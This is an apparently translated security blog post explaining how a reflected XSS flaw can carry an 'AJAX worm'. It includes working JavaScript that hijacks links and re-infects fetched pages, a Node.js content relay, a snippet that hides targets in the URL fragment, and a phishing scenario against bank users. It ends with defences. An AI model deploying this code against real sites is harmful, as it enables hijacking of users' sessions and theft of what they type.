One step from a passive XSS vulnerability to an AJAX worm
I often run into the opinion that passive (reflected) XSS vulnerabilities pose no great danger and are hardly worth worrying about. And although this is partly true (compared with other, more catastrophic bugs), the ability to inject code into a vulnerable site, even when it takes considerable extra effort to trick the user, can lead to serious consequences, up to and including the ability to fully intercept the user's further actions.

What is an AJAX worm?


An AJAX worm is JavaScript code that modifies the links on a page so that the user, following them, stays in the context of the current page: normal navigation is replaced with AJAX requests. In its simplest form it can be implemented in a few lines, as follows.

1. Collect all the links on the page.
2. Attach our own click handler to each of them.
3. On a click, perform an AJAX request to the address of the clicked link.
4. Replace the page content with the result obtained in step 3.
5. Infect the links in the new content.

Obviously, this is a very simplified scenario: a full "combat" worm would also correctly update the page title, pull in the CSS and JS files referenced in the head, and perhaps exploit URL spoofing in those browsers where it is possible. But even the simplest variant, which dumps the received data straight into the body element, works well enough. A sketch of such an implementation follows.
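
Below is a minimal sketch of those five steps in plain browser JavaScript. It is my own illustration of the scheme, not the example referenced in the original post; all names in it are arbitrary.

    // Minimal illustration of the five steps above; all names are arbitrary.
    function infect(root) {
        var links = root.querySelectorAll('a[href]');          // 1. collect the links
        for (var i = 0; i < links.length; i++) {
            links[i].addEventListener('click', function (e) {  // 2. attach our handler
                e.preventDefault();                             //    cancel real navigation
                var url = this.getAttribute('href');
                var xhr = new XMLHttpRequest();                 // 3. fetch the clicked link
                xhr.open('GET', url);
                xhr.onload = function () {
                    document.body.innerHTML = xhr.responseText; // 4. swap in the result
                    infect(document.body);                      // 5. infect the new content
                };
                xhr.send();
            });
        }
    }
    infect(document.body);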

A small digression: if a page could fetch arbitrary content from anywhere on the network, this security problem would be far more serious; fortunately, all modern browsers forbid cross-site requests. That restriction can be circumvented, however, by routing the request through an intermediate application that sits on the same domain as the page carrying the worm and acts as a content relay.


In the simplest case such an application is a single line of PHP. A "combat" version should at least cache the downloaded data, to hide the roughly doubled time it now takes the client to receive it, and ideally should also support sending and receiving cookies and make its requests through a pool of proxies, so that the same IP does not light up in the logs too often.
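
The post does not quote that PHP one-liner, so purely as an illustration of the idea, and in JavaScript to match the other sketches here, a minimal relay might look roughly like this (the url parameter name and everything else is an assumption):

    // Hypothetical minimal content relay: fetches ?url=... and streams it back.
    // Illustration only; the post describes a one-line PHP equivalent.
    const http = require('http');
    const https = require('https');

    http.createServer(function (req, res) {
        const target = new URL(req.url, 'http://localhost').searchParams.get('url');
        if (!target) { res.writeHead(400); res.end(); return; }
        const client = target.indexOf('https:') === 0 ? https : http;
        client.get(target, function (upstream) {
            res.writeHead(upstream.statusCode, upstream.headers);
            upstream.pipe(res);                 // hand the fetched page to the worm
        }).on('error', function () { res.writeHead(502); res.end(); });
    }).listen(8080);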

Even in this simplest case we get an infected page that lets the user "move" around the network while actually staying on the same page, and that, if we wish, logs the victim's navigation and every piece of data he enters. Of course, if the user notices that the page address magically never changes, or that the status bar constantly shows requests to an unfamiliar domain, he may raise the alarm at once; but we are clever, and the average user can easily overlook all of this.

Although plenty of dirty tricks can be pulled off this way, it takes too much effort just to lure the victim onto the trap page in the first place, not to mention that such a page very quickly ends up on the browsers' blacklists. But what if the trap page were not some strange address but a perfectly safe-looking page on a domain the user already knows? This is where the ability to inject our code through an XSS vulnerability on someone else's site comes into play.

Imagine an intelligent attacker running a phishing campaign against a bank's users. He does not need to set up any fraudulent site: it is enough to put a link to the vulnerable page in the letter, and the user, confident that he is going to a trusted domain, lands in the contaminated zone. Nor does it matter that the page that opens is, say, the site's search page: JavaScript can rewrite its content arbitrarily, so the user can be shown the front page or anything else instead.

Moreover, the attacker can drop the relay layer entirely, because the requested pages live on the same domain and can therefore be fetched with direct AJAX requests. Alternatively, he can reuse the same vulnerable page to make the infection less noticeable: the transitions between pages are then real, and the target link can be hidden, for example, in the anchor (fragment) part of the URL.
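
As a rough sketch of that last variant (nothing here is taken from the post; the encoding scheme is assumed): the rewritten links point back at the vulnerable page and smuggle the real destination in the URL fragment, which the server never sees.

    // Hypothetical sketch: the real target travels in location.hash.
    function rewriteLink(a, vulnerablePage) {
        // Point the link back at the vulnerable page, smuggling the true
        // destination in the fragment, e.g. /search?q=<payload>#aHR0cDovLy4uLg
        a.href = vulnerablePage + '#' + btoa(a.getAttribute('href'));
    }

    // When the (re-exploited) page loads, the injected code reads the fragment
    // and pulls in the page the user actually asked for.
    if (location.hash.length > 1) {
        var target = atob(location.hash.slice(1));
        var xhr = new XMLHttpRequest();
        xhr.open('GET', target);
        xhr.onload = function () { document.body.innerHTML = xhr.responseText; };
        xhr.send();
    }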



What to do about all this?


Do not let XSS vulnerabilities exist in the first place: manual and automated testing, plus frameworks with a correct policy of escaping any data that comes from outside.
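
What "correct escaping" means in practice is simply that nothing arriving from outside reaches the markup as markup; a minimal, framework-free illustration (the element id and query parameter are made up):

    // Minimal illustration of output escaping; element id and parameter are made up.
    function escapeHtml(s) {
        return String(s)
            .replace(/&/g, '&amp;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/"/g, '&quot;')
            .replace(/'/g, '&#39;');
    }

    var query = new URLSearchParams(location.search).get('q') || '';
    // Vulnerable: element.innerHTML = 'Results for ' + query;
    document.getElementById('results').innerHTML = 'Results for ' + escapeHtml(query);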

Once the attacker has injected his code into a page of our site, we have completely lost control of it: any protective scripts can be stripped out of the delivered page, and the data the user enters can be forwarded to the attacker's server. The only palliative is a fixed login page whose submission script checks the referer and the IP address of the sender; that at least keeps the attacker from getting into the system automatically. It does not, however, stop him from using the stolen credentials himself.
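
A rough sketch of that palliative, with only the Referer part shown and every name in it assumed (an IP comparison would additionally require remembering, per session, the address that requested the login form):

    // Hypothetical login handler that refuses credentials submitted from anywhere
    // other than our own fixed login page. Sketch only; names are made up.
    const http = require('http');

    const LOGIN_PAGE = 'https://bank.example/login';

    http.createServer(function (req, res) {
        if (req.method === 'POST' && req.url === '/do-login') {
            const referer = req.headers['referer'] || '';
            if (referer.indexOf(LOGIN_PAGE) !== 0) {
                res.writeHead(403);
                res.end('login must be submitted from the login page');
                return;
            }
            // ...the normal credential check would go here...
        }
        res.end();
    }).listen(8081);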